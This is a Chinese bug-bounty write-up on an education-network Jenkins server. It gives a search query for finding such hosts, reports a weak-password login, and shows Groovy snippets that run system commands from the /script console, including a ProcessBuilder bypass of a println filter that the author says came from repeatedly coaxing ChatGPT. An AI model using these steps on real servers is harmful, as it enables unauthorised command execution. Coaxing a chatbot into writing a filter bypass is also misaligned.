EDUSRC-记一个SHELL捡漏

目录

​编辑

Jenkins - println绕过到shell命令执行

语法

Jenkins未授权访问(捡漏失败)

Jenkins捡漏

弱口令

脚本执行(println失败)

CHATGPT调教绕过

                                     hack渗透视频教程,扫码免费领


Jenkins - println绕过到shell命令执行

语法

  1. org="China Education and Research Network Center" && icon_hash="81586312"

EDUSRC-记一个SHELL捡漏_第1张图片

语法说明:两个部分

org表示筛选的目标为edu组织

icon_hash筛选的是图标,特定Jenkins系列中的某一个图标

Jenkins未授权访问(捡漏失败)

熟悉Jenkins的应该清楚,若配置不当可直接未授权访问EDUSRC-记一个SHELL捡漏_第2张图片

 通常来说该类的标题可以搜索title="Dashboard"

通常来说该类的标题可以搜索title="Dashboard"

EDUSRC-记一个SHELL捡漏_第3张图片

Jenkins捡漏

弱口令

在浏览信息收集的过程中发现如下登录框

EDUSRC-记一个SHELL捡漏_第4张图片

浅浅试了一下弱口令,进去了~

脚本执行(println失败)

进入之后我们会来到/script端点下的命令行,执行groovy script脚本做到类命令执行的操作

 
  
  1. Groovy脚本是一种基于Java语法的动态编程语言。它在Java平台上运行,并且与Java语言高度兼容。Groovy提供了许多特性和语法糖,使得编写代码更加简洁和易读。

由于基于Java语法,因此可以用以下语句测试进行执行验证

 
  
  1. println "whoami".execute().text
 
  
  1. 在Groovy脚本中,println是用于在控制台输出消息的方法。而execute().text是用于在执行命令时获取命令输出的方式。

案例如下

EDUSRC-记一个SHELL捡漏_第5张图片

但是在实际测试过程中输入println发现直接未响应,而输入其他的未发生

因此发现了过滤(这边漏洞已修,忘记截图ing)

CHATGPT调教绕过

通过测试清楚了是println被过滤之后,直接使用CHATGPT进行漫长的调教

 EDUSRC-记一个SHELL捡漏_第6张图片

由于是之前进行调教的,这里放出结果,最终找到的替代方法

 
  
  1. def command = ["whoami"]
  2. def process = new ProcessBuilder(command).start()
  3. def inputStream = process.getInputStream()
  4. def result = new Scanner(inputStream).useDelimiter("\\A").next()
  5. print(result)

EDUSRC-记一个SHELL捡漏_第7张图片

                                     hack渗透视频教程,扫码免费领

EDUSRC-记一个SHELL捡漏_第8张图片

EDUSRC-记一个SHELL捡漏_第9张图片

你可能感兴趣的:(技术干货,servlet,java,前端,网络安全,web安全,网络,安全)